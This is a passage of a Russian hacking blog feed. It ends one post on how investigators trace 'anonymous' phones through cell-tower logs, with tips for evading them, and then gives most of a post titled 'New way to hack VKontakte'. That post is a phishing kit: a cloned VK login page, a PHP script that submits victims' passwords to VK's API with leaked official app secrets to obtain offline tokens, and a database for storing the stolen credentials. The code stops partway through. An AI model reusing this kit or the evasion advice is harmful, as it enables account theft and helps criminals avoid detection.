все ни минуты без мобилы. И это Вас палит: Вы же не можете &lt;br /&gt;одновременно делать исходящие с двух телефонов. Значит пока Вы &amp;quot;работаете&amp;quot; с &lt;br /&gt;&amp;quot;анонимного&amp;quot; все, кто звонит в Вашей соте - выходят из под подозрения и сужают &lt;br /&gt;кольцо вокруг Вас. Кроме того господин Случай не на Вашей стороне: у спецслужб &lt;br /&gt;логи, в которых все данные от и до, а у Вас обычный быт со всеми &lt;br /&gt;непредсказуемостями.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1a/73/1a73ab35-e7ed-4993-a37e-218c1b51a1f1.png&quot; width=&quot;1200&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;Пример&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Вы сёрфите &amp;quot;анонимно&amp;quot; в интернете и тут Вам звонят на настоящий телефон. Вы &lt;br /&gt;начинаете говорить и трафик данных по интернету падает на время, статистически &lt;br /&gt;отличное от времени между средними загрузками страниц. Сопоставить все звонки&lt;br /&gt;в соте на точное совпадение с провалом трафика - дело секунд - и Ваш номер &lt;br /&gt;обнаружен. Может быть, конечно, что Вы просто пошли в туалет, но ведь проверить &lt;br /&gt;нужный ли номер &amp;quot;обнаружен&amp;quot; не сложно. А если Вам позвонят два раза?&lt;br /&gt;Преступник включил аппарат, отправил СМС с требованием выкупа, выключил. &lt;br /&gt;Через день включил, позвонил обсудить условия выкупа, выключил. Третий раз &lt;br /&gt;включил - сообщил место встречи и время, выключил. Мы изучили логи по трём &lt;br /&gt;&amp;quot;включениям&amp;quot;, - кто в этот момент был в соте все три раза. От второй &amp;quot;сверки&amp;quot; &lt;br /&gt;осталось четыре номера, от третьей - один.&lt;/p&gt;
  &lt;h2&gt;Ситуация вторая&lt;/h2&gt;
  &lt;p&gt;Вы пользуетесь &amp;quot;анонимным&amp;quot; мобильником, а настоящий предусмотрительно &lt;br /&gt;заранее выключаете. Невероятно, но Вы только упростили задачу следователям. &lt;br /&gt;Они просто посмотрят, кто отключился - именно отключился (телефон передает в &lt;br /&gt;сеть сигнал об отключении), а не покинул сеть незадолго до появления &lt;br /&gt;&amp;quot;анонимного&amp;quot;. Можно смело говорить, что таких в соте будут единицы или даже Вы &lt;br /&gt;один. Для уточнения данных можно сравнить кто включился после отключения &lt;br /&gt;&amp;quot;анониста&amp;quot;. И так же пробить на бабуль и прочих. Как видите, отключение &lt;br /&gt;настоящего аппарата при пользовании &amp;quot;левым&amp;quot; только ухудшает анонимность.&lt;/p&gt;
  &lt;h2&gt;Ситуация третья&lt;/h2&gt;
  &lt;p&gt;Вы оставляете настоящий телефон дома включенным, а сами едете в другую соту и &lt;br /&gt;только там включаете &amp;quot;анонимный&amp;quot;. Думаете хитрый план? А вот нифига. Три &lt;br /&gt;фактора все равно выдают Ваш настоящий аппарат. Во-первых, отрабатывается та &lt;br /&gt;же схема, что и в первой ситуации, только уже не по одной соте, а по нескольким. &lt;br /&gt;Сначала по одной, потом по соседним и так далее пока не дойдут до сравнения &lt;br /&gt;соты &amp;quot;анонимного&amp;quot; с сотой настоящего. Во-вторых, и в главных: Ваш аппарат дома &lt;br /&gt;находится без хозяина и не может отвечать на звонки. Следовательно рано или &lt;br /&gt;поздно будут пропущенные, которые так же видны в логах. Нужно только сравнить &lt;br /&gt;на каком аппарате были пропущенные во все времена &amp;quot;включения&amp;quot; анонимного. &lt;br /&gt;Как думаете, многие из абонентов постоянно не берут трубку как раз в то время, &lt;br /&gt;когда Вы выходите с анонимного? Да никто, кроме Вашего настоящего телефона! &lt;br /&gt;Кроме того данный способ хорошо помогает в общем поиске: следователи могут &lt;br /&gt;очень быстро обзвонить номера, что остаются после сравнения логов сот. И если &lt;br /&gt;телефон не берут - в подозреваемые. В-третьих, Вы не можете оставлять &lt;br /&gt;настоящий аппарат где попало - каждый раз в разных местах. Скорее всего он у &lt;br /&gt;Вас дома. То есть в одном месте на каждое включение. На этом можно построить &lt;br /&gt;дополнительную выборку для фильтра: сколько одних и тех же аппаратов &lt;br /&gt;находилось в одной и той же соте. В целом всё это приведет к быстрому, хоть и чуть&lt;br /&gt;менее быстрому, чем в предыдущих случаях, выходу на настоящий номер.&lt;/p&gt;
  &lt;h2&gt;Ситуация четвертая&lt;/h2&gt;
  &lt;p&gt;Вы выключаете настоящий телефон дома, а сами едете в другую соту и только там &lt;br /&gt;включаете &amp;quot;анонимный&amp;quot;. См. ситуацию №3 + ситуацию №2&lt;br /&gt;Получается, вся схема работает на том, что делается несколько включений с одного &lt;br /&gt;номера. То есть, если выходить с номера только один раз и потом выкидывать &lt;br /&gt;симку и телефон - найти будет невозможно? Это поможет только в том случае, если&lt;br /&gt;и &amp;quot;дело&amp;quot; Ваше на один раз и других похожих дел не было и больше не будет. Смена &lt;br /&gt;номеров ничуть не усложнит задачу поиска настоящего телефона. Например, в том &lt;br /&gt;же примере про шантаж: как смена номера поможет - ведь жертве-то одной и той &lt;br /&gt;же совершаются звонки. &lt;br /&gt;Следователи будут просто пробивать не по одному номеру 3 включения, а три &lt;br /&gt;включения разных номеров. Аналогично &amp;quot;темные делишки&amp;quot; в Интернете - номера &lt;br /&gt;легко объединяются по общему &amp;quot;делу&amp;quot;. Скажем более - частая смена номеров &lt;br /&gt;только ухудшают безопасность т.к. следователи получат группы номеров и смогут &lt;br /&gt;легко пробить, например, откуда симки. И накрыть вас с поличным во время &lt;br /&gt;закупки новых или выйти на &amp;quot;продавца&amp;quot;, который сделает &amp;quot;робота&amp;quot; или сольет &lt;br /&gt;номер, с которого Вы звонили ему. Анонимность - это не отсутствие данных для &lt;br /&gt;идентификации. Такого в современном мире просто быть не может. Анонимность - &lt;br /&gt;это хорошая имитация обычной, но не настоящей личности.&lt;/p&gt;
  &lt;h2&gt;Что даст спецслужбам номер настоящего телефона?&lt;/h2&gt;
  &lt;p&gt;Мы рассмотрели, как легко и просто &amp;quot;пробить&amp;quot; силовикам настоящий номер &lt;br /&gt;подозреваемого по его &amp;quot;анонимному&amp;quot;. Но что даст инфа о настоящем телефоне? Да &lt;br /&gt;всё, кроме информации, на кого оформлен номер. &lt;br /&gt;Следователи увидят, кому Вы звонили и наверняка среди них много тех, кто знает &lt;br /&gt;Вас лично. Увидят, кто и как пополнял счет. Скорее всего там есть платежи и с &lt;br /&gt;настоящей карты через банкомат или с настоящего Вебмани-кошелька и т.д. То &lt;br /&gt;есть, собственно, Вы приплыли.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/cd/f1/cdf15e28-ae0c-45fe-8430-41b9c7aba978.png&quot; width=&quot;1024&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2&gt;Как пеленгуют мобильный телефон?&lt;/h2&gt;
  &lt;p&gt;На место в район работы соты, в которой находится телефон подозреваемого, &lt;br /&gt;выдвигается оперативная группа с ручным пеленгатором. Это никакой не экран с &lt;br /&gt;точкой, как показывают в фильмах, а простой радиоприемник со стрелкой, которая &lt;br /&gt;показывает мощность сигнала и антенной в форме буквы Н, буквы Ж, хитрой &lt;br /&gt;трубки или гиперболической / параболической тарелки (часто в комплекте идет &lt;br /&gt;несколько антенн для разных условий работы). Информация, на какой точно частоте&lt;br /&gt;работает в настоящее время искомый аппарат, имеется у базовой станции. Опер &lt;br /&gt;настраивает на эту частоту приемник, крутит вокруг себя антенной и смотрит на &lt;br /&gt;стрелку. Откуда сигнал сильнее всего - туда и идет. Заходит в подъезд, &lt;br /&gt;поднимается по лестнице и меряет сигнал. Находит таким образом нужный этаж, &lt;br /&gt;потом квартиру и всё, &amp;quot;анонимность&amp;quot; закончена. В наблюдаемом нами случае &lt;br /&gt;время от подъезда &amp;quot;газели&amp;quot; оперов до вывода под белы ручки составило 25 минут. &lt;br /&gt;Учитывая, сколько из них ушло на рекомендации &amp;quot;открывайте, ибо откроем в любом&lt;br /&gt;случае&amp;quot;, сборы и вывод подозреваемого, можно прикинуть, за сколько среди &lt;br /&gt;десятков домов, сотен подъездов и тысяч квартир нашли нужную.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/26/b3/26b35a25-4b88-4c03-aa48-cba8b761f1ce.png&quot; width=&quot;900&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2&gt;Так что же делать? Анонимность - миф?&lt;/h2&gt;
  &lt;p&gt;Выше мы подробно рассмотрели, что имея настоящий личный мобильник, мы &lt;br /&gt;никогда не будем анонимны даже с только что купленного нового телефона и &lt;br /&gt;только что купленной в подворотне сим-карты без оформления. Как мы уже &lt;br /&gt;говорили, доступная анонимность - это хорошая имитация обычной, но не &lt;br /&gt;настоящей личности. А отсутствие личности вообще в наших современных &lt;br /&gt;информационных реалиях просто невозможно. Ведь вот Вы, личность, сидите &lt;br /&gt;прямо тут и читаете эту статью.&lt;br /&gt;Настоящие хакеры, чья свобода, а, быть может, и жизнь, зависит от анонимности, &lt;br /&gt;не пользуются мобильными телефонами в повседневной жизни. Вообще не &lt;br /&gt;пользуются. Только одноразовые звонки, скайп и т.п. Да и жизни &amp;quot;повседневной&amp;quot; у &lt;br /&gt;них нет. Вечная мгла, небытие. Нет друзей, нет родных, нет привычек и &amp;quot;любимых&amp;quot; &lt;br /&gt;мест. Вот что такое анонимность. Но, на самом деле, в Сети есть полноценная &lt;br /&gt;другая жизнь, другие друзья и другие &amp;quot;места&amp;quot;. И, часто, не только не хуже, но и &lt;br /&gt;получше, чем в реале. Так что не все так грустно. Просто не так, как у большинства. &lt;br /&gt;Однако это уже не &amp;quot;анонимность&amp;quot;.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/dd/cd/ddcd0bc2-a86c-40b4-a09f-d67d55a3134f.png&quot; width=&quot;810&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;У Вас есть имя, пусть и никнейм, но по нему знают именно Вас, у Вас есть &lt;br /&gt;интернет-друзья и места, где Вас можно найти в сети. Вас можно даже &amp;quot;наказать&amp;quot; &lt;br /&gt;хоть и без поездки в Сибирь. Таким образом легко понять, что условна не только &lt;br /&gt;анонимность, но и свобода, а &amp;quot;преступление&amp;quot; и &amp;quot;законы&amp;quot; - не едины, а &lt;br /&gt;относительны к обществу. А &amp;quot;общества&amp;quot; бывают разные.&lt;br /&gt;Узнав немного о методах работы следователей Вы можете принять меры по &lt;br /&gt;улучшению безопасности в каждом конкретном случае. Например, в ситуации №3 &lt;br /&gt;можно на настоящий телефон установить автоответчик или попросить друга &lt;br /&gt;отвечать, если позвонят. Зарегистрировать настоящий телефон на настоящую &lt;br /&gt;бабушку, чтобы пройти &amp;quot;фильтр на бабушку&amp;quot;. Стараться рандомно комбинировать &lt;br /&gt;ситуации, оставлять телефон в разных местах и т.п. Это несколько усложнит работу &lt;br /&gt;следователей, но и усложнит Вашу &amp;quot;темную деятельность&amp;quot;. А поможет ли в &amp;quot;час &lt;br /&gt;икс&amp;quot;? Далеко не факт.&lt;br /&gt;Так что хорошо подумай, мой юный хакер с криминальными наклонностями, стоит ли &lt;br /&gt;вообще игра свеч или, быть может, после одного-двух удачных дел лучше купить &lt;br /&gt;квартиру, машину, какой-никакой белый бизнес и завязать с &amp;quot;темной стороной&amp;quot; &lt;br /&gt;навсегда?&lt;/p&gt;
  &lt;h2&gt;🔥ПРОФИТ!&lt;/h2&gt;
  &lt;p&gt;Вот и все дорогие хакерята! Фантастика превратилась в реальность!&lt;/p&gt;

</content></entry><entry><id>morhack:Isic5-Tv3</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/Isic5-Tv3?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>Новый способ взлома Вконтакте</title><published>2020-10-15T15:15:19.519Z</published><updated>2020-10-15T15:15:41.196Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/72/4a/724aed21-1b3c-4624-830f-20c724134c87.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/db/ec/dbece34d-812d-493e-b399-eb03231ed24d.png&quot;&gt;Вы постоянно пишите: MorHack, дай еще способов взломать ВК, очень надо.</summary><content type="html">
  &lt;p&gt;Вы постоянно пишите: MorHack, дай еще способов взломать ВК, очень надо.&lt;/p&gt;
  &lt;p&gt;Ну если надо, то держите, конечно! Да это не легко, но тот, кому реально это надо, воспользуется и получит результат, а лентяи и халявщики - мимо.&lt;/p&gt;
  &lt;p&gt;Суть механизма заключается в том, что мы будем отправлять данные из HTML-&lt;br /&gt;форм на сервера вконтакте. В ответ мы получим access token.&lt;br /&gt;Делать мы это будем с помощью cUrl и прямой авторизации через API VK. &lt;br /&gt;Выполнять авторизацию будем, представляясь официальным приложением. Запрос &lt;br /&gt;на прямую авторизацию выглядит примерно так:&lt;/p&gt;
  &lt;p&gt;Код:&lt;br /&gt;https://api.vk.com/oauth/token?&lt;br /&gt;grant_type=password&amp;amp;client_id=[наше значение]&amp;amp;scope=[наше &lt;br /&gt;значение]&amp;amp;client_secret=[наше значение]&amp;amp;username=[наше &lt;br /&gt;значение]&amp;amp;password=[наше значение]&lt;/p&gt;
  &lt;p&gt;Что все это значит:&lt;br /&gt;clenit_id - это id нашего приложения. Запишем в client_id значение 2274003.&lt;br /&gt;scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не &lt;br /&gt;будем, а просто запросим офлайн токен, записав в scope значение &amp;quot;offline&amp;quot;. Этого&lt;br /&gt;будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !&lt;br /&gt;Важно: такой токен &amp;quot;живет&amp;quot; до тех пор, пока пользователь не сменит пароль, &lt;br /&gt;либо завершит все сессии в настройках безопасности.&lt;br /&gt;client_secret - секретный ключ Вашего приложения. Будет равен &lt;br /&gt;hHbZxrka2uZ6jB1inYsH&lt;br /&gt;username - логин пользователя ВКонтакте&lt;br /&gt;password - пароль пользователя ВКонтакте&lt;/p&gt;
  &lt;p&gt;Варианты официальных clenit_id и client_secret&lt;br /&gt;Android:&lt;br /&gt;client_id: 2274003&lt;br /&gt;client_secret: hHbZxrka2uZ6jB1inYsH&lt;/p&gt;
  &lt;p&gt;IPhone:&lt;br /&gt;client_id: 3140623&lt;br /&gt;client_secret: VeWdmVclDCtn6ihuP1nt&lt;/p&gt;
  &lt;p&gt;IPad:&lt;br /&gt;client_id: 3682744&lt;br /&gt;client_secret: mY6CDUswIVdJLCD3j15n&lt;/p&gt;
  &lt;p&gt;Windows desktop:&lt;br /&gt;client_id: 3697615&lt;br /&gt;client_secret: AlVXZFMUqyrnABp8ncuU&lt;/p&gt;
  &lt;p&gt;Windows phone:&lt;br /&gt;client_id: 3502557&lt;br /&gt;client_secret: PEObAuQi6KloPM4T30DV&lt;/p&gt;
  &lt;p&gt;Теперь необходима форма авторизации как в вк.&lt;br /&gt;Создадим php документ authorize.php&lt;br /&gt;authorize.php:&lt;br /&gt;&amp;lt;!DOCTYPE html PUBLIC &amp;quot;-//W3C//DTD XHTML 1.0 Strict//EN&amp;quot; &lt;br /&gt;&amp;quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;html xmlns=&amp;quot;http://www.w3.org/1999/xhtml&amp;quot; xml:lang=&amp;quot;en&amp;quot; &lt;br /&gt;lang=&amp;quot;en&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;head&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;?php&lt;/p&gt;
  &lt;p&gt;$errorGet = $_GET[&amp;#x27;error_login&amp;#x27;];&lt;/p&gt;
  &lt;p&gt;if (!$errorGet)&lt;/p&gt;
  &lt;p&gt;{&lt;/p&gt;
  &lt;p&gt;echo &amp;quot;&amp;lt;style&amp;gt;&lt;/p&gt;
  &lt;p&gt;#hide_row_pass {display: none;}&lt;/p&gt;
  &lt;p&gt;&amp;lt;/style&amp;gt;&amp;quot;;&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;else&lt;/p&gt;
  &lt;p&gt;{&lt;/p&gt;
  &lt;p&gt;echo &amp;quot;&amp;lt;style&amp;gt;&lt;/p&gt;
  &lt;p&gt;#hide_row_pass {display: block;}&lt;/p&gt;
  &lt;p&gt;&amp;lt;/style&amp;gt;&amp;quot;;&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;?&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;meta http-equiv=&amp;quot;X-UA-Compatible&amp;quot; content=&amp;quot;IE=edge&amp;quot; /&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;title&amp;gt;ВКонтакте | Вход&amp;lt;/title&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; type=&amp;quot;text/css&amp;quot; href=&amp;quot;css/al/&lt;br /&gt;common.css?34795707965&amp;quot; /&amp;gt;&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; type=&amp;quot;text/css&amp;quot;&lt;br /&gt;href=&amp;quot;css/al/fonts_cnt.css?5181750877&amp;quot; /&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;link type=&amp;quot;text/css&amp;quot; rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;css/api/&lt;br /&gt;oauth_popup.css?29651175773&amp;quot;&amp;gt;&amp;lt;/link&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;meta http-equiv=&amp;quot;content-type&amp;quot; content=&amp;quot;text/html; &lt;br /&gt;charset=utf-8&amp;quot; /&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;link rel=&amp;quot;shortcut icon&amp;quot; href=&amp;quot;images/icons/favicons/&lt;br /&gt;fav_logo_2x.ico?8&amp;quot;&amp;gt;&amp;lt;/link&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/head&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;body class=&amp;quot;VK oauth_centered&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;script&amp;gt;&lt;/p&gt;
  &lt;p&gt;if (window.devicePixelRatio &amp;gt;= 2) document.body.className &lt;br /&gt;+= &amp;#x27; is_2x&amp;#x27;;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_wrap&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_wrap_inner&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_wrap_content&amp;quot; id=&amp;quot;oauth_wrap_content&amp;quot;&amp;gt;&lt;br /&gt; &amp;lt;div class=&amp;quot;oauth_head&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;a class=&amp;quot;oauth_logo fl_l&amp;quot; href=&amp;quot;https://vk.com&amp;quot; &lt;br /&gt;target=&amp;quot;_blank&amp;quot;&amp;gt;&amp;lt;/a&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div id=&amp;quot;oauth_head_info&amp;quot; class=&amp;quot;oauth_head_info fl_r&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;a class=&amp;quot;oauth_reg_link&amp;quot; href=&amp;quot;https://vk.com/join?reg=1&amp;quot; &lt;br /&gt;target=&amp;quot;_blank&amp;quot;&amp;gt;Регистрация&amp;lt;/a&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_content box_body clear_fix&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;box_msg_gray box_msg_padded&amp;quot;&amp;gt;Для продолжения Вам &lt;br /&gt;необходимо войти &amp;lt;b&amp;gt;ВКонтакте&amp;lt;/b&amp;gt;.&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;form method=&amp;quot;POST&amp;quot; id=&amp;quot;login_submit&amp;quot; action=&amp;quot;login.php&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_form&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div id=&amp;quot;hide_row_pass&amp;quot; class=&amp;quot;box_error&amp;quot;&amp;gt;Указан неверный &lt;br /&gt;логин или пароль.&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_form_login&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_form_header&amp;quot;&amp;gt;Телефон или email&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;input type=&amp;quot;text&amp;quot; class=&amp;quot;oauth_form_input dark&amp;quot; &lt;br /&gt;name=&amp;quot;login&amp;quot; value=&amp;quot;&amp;quot;&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;div class=&amp;quot;oauth_form_header&amp;quot;&amp;gt;Пароль&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;input type=&amp;quot;password&amp;quot; class=&amp;quot;oauth_form_input dark&amp;quot; &lt;br /&gt;name=&amp;quot;password&amp;quot; /&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;button class=&amp;quot;flat_button oauth_button button_wide&amp;quot; &lt;br /&gt;id=&amp;quot;install_allow&amp;quot; type=&amp;quot;submit&amp;quot; name=&amp;quot;submit_login&amp;quot;&amp;gt;Войти&amp;lt;/&lt;br /&gt;button&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;a class=&amp;quot;oauth_forgot&amp;quot; href=&amp;quot;https://vk.com/restore&amp;quot; &lt;br /&gt;target=&amp;quot;_blank&amp;quot;&amp;gt;Забыли пароль?&amp;lt;/a&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/form&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/body&amp;gt;&lt;/p&gt;
  &lt;p&gt;&amp;lt;/html&amp;gt;&lt;/p&gt;
  &lt;p&gt;Архив со всеми картинками и стилями: &lt;br /&gt;https://yadi.sk/d/186Rs3g68l66SQ&lt;br /&gt;VT: &lt;br /&gt;https://www.virustotal.com/#/file/b...293d7ad391605c37f64987f0d51b7079348/&lt;br /&gt;detection&lt;/p&gt;
  &lt;p&gt;Выглядеть будет так:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/db/ec/dbece34d-812d-493e-b399-eb03231ed24d.png&quot; width=&quot;816&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/10/34/1034a534-264e-42e0-b835-ef91c068dcb4.png&quot; width=&quot;797&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и &lt;br /&gt;получение токена. Назовем login.php&lt;br /&gt;Но перед этим создадим БД куда будем записывать все валидные данные.&lt;/p&gt;
  &lt;p&gt;1. Переходим на хостинге в PhpMyAdmin и нажимаем &amp;quot;Создать&amp;quot;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a0/af/a0afe720-d84a-4902-8cc2-964722a9da47.png&quot; width=&quot;469&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;2. Создадим таблицу на 7 столбцов&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/37/2e/372e4d54-7edc-4684-911b-1864846eb154.png&quot; width=&quot;549&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя &lt;br /&gt;(first_name) и Фамилия (last_name) зададим как на картинке&lt;br /&gt;В параметрах столбца id должен быть отмечен параметр &amp;quot;A_I&amp;quot; (auto_increment) и &lt;br /&gt;стоять PRIMARY KEY.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/6e/05/6e0550d2-8cd5-4c5a-a791-8ea39e55da93.png&quot; width=&quot;1464&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь сам файл login.php:&lt;br /&gt;&amp;lt;?php&lt;/p&gt;
  &lt;p&gt;//Создадим headers&lt;/p&gt;
  &lt;p&gt;$headers = array(&lt;/p&gt;
  &lt;p&gt;&amp;#x27;accept&amp;#x27; =&amp;gt; &amp;#x27;text/html,application/xhtml+xml,application/&lt;br /&gt;xml;q=0.9,image/webp,*/*;q=0.8&amp;#x27;,&lt;/p&gt;
  &lt;p&gt;&amp;#x27;content-type&amp;#x27; =&amp;gt; &amp;#x27;application/x-www-form-urlencoded&amp;#x27;,&lt;/p&gt;
  &lt;p&gt;&amp;#x27;user-agent&amp;#x27; =&amp;gt; &amp;#x27;Mozilla/5.0 (Windows NT 10.0; WOW64) &lt;br /&gt;AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 &lt;br /&gt;Safari/537.36&amp;#x27;&lt;/p&gt;
  &lt;p&gt;);&lt;/p&gt;
  &lt;p&gt;//Запишем сюда значения логина и пароля из HTML формы&lt;/p&gt;
  &lt;p&gt;$login = $_POST[&amp;#x27;login&amp;#x27;];&lt;/p&gt;
  &lt;p&gt;$password = $_POST[&amp;#x27;password&amp;#x27;];&lt;/p&gt;
  &lt;p&gt;//Если какое-то поле оказалось пустым&lt;/p&gt;
  &lt;p&gt;if (empty($login) or empty($password))&lt;/p&gt;
  &lt;p&gt;{&lt;/p&gt;
  &lt;p&gt;//Отправим пользователя на стартовую страницу authorize и &lt;br /&gt;просигнализируем об ошибке&lt;/p&gt;
  &lt;p&gt;header(&amp;#x27;Location: /authorize.php?error_login=true&amp;#x27;);&lt;/p&gt;
  &lt;p&gt;exit;&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;else&lt;/p&gt;
  &lt;p&gt;{&lt;/p&gt;
  &lt;p&gt;//Если все поля заполнены, то посылаем запрос на получение &lt;br /&gt;токена по нашей ссылке выше&lt;/p&gt;
  &lt;p&gt;$get_token = post (&amp;#x27;https://api.vk.com/oauth/token?&lt;br /&gt;grant_type=password&amp;amp;client_id=2274003&amp;amp;scope=offline&amp;amp;client_secre&lt;br /&gt;t=hHbZxrka2uZ6jB1inYsH&amp;amp;username=&amp;#x27;.$login.&amp;#x27;&amp;amp;password=&amp;#x27;.&lt;br /&gt;$password.&amp;#x27;&amp;#x27; ,array(&lt;/p&gt;
  &lt;p&gt;&amp;#x27;headers&amp;#x27; =&amp;gt; array(&lt;/p&gt;
  &lt;p&gt;&amp;#x27;accept: &amp;#x27;.$headers[&amp;#x27;accept&amp;#x27;],&lt;/p&gt;
  &lt;p&gt;&amp;#x27;content-type: &amp;#x27;.$headers[&amp;#x27;content-type&amp;#x27;],&lt;/p&gt;
  &lt;p&gt;&amp;#x27;user-agent: &amp;#x27;.$headers[&amp;#x27;user-agent&amp;#x27;]&lt;/p&gt;
  &lt;p&gt;)&lt;/p&gt;
  &lt;p&gt;));&lt;/p&gt;
  &lt;p&gt;//Если авторизация прошла успешно&lt;/p&gt;
  &lt;p&gt;if (preg_match(&amp;quot;/[a-z0-9]{85}/&amp;quot;, $get_token[&amp;#x27;headers&amp;#x27;], $token))&lt;br /&gt;{&lt;/p&gt;
  &lt;p&gt;$token1 = json_decode(file_get_contents(&amp;#x27;https://api.vk.com/&lt;br /&gt;oauth/token?&lt;br /&gt;grant_type=password&amp;amp;client_id=2274003&amp;amp;scope=offline&amp;amp;client_secre&lt;br /&gt;t=hHbZxrka2uZ6jB1inYsH&amp;amp;username=&amp;#x27;.$login.&amp;#x27;&amp;amp;password=&amp;#x27;.&lt;br /&gt;$password.&amp;#x27;&amp;#x27;), true);&lt;/p&gt;
  &lt;p&gt;$data = json_decode(file_get_contents(&amp;#x27;https://api.vk.com/&lt;br /&gt;method/users.get?user_id=&amp;#x27;.$token1[&amp;#x27;user_id&amp;#x27;].&amp;#x27;&amp;amp;access_token=&amp;#x27;.&lt;br /&gt;$token[0].&amp;#x27;&amp;amp;fields=uid,first_name,last_name&amp;amp;v=5.80&amp;#x27;), true);&lt;/p&gt;
  &lt;p&gt;//Записываем в переменную текущую дату и время сервера&lt;/p&gt;
  &lt;p&gt;$date_l = date(&amp;quot;H:i:s d-m-Y&amp;quot;);&lt;/p&gt;
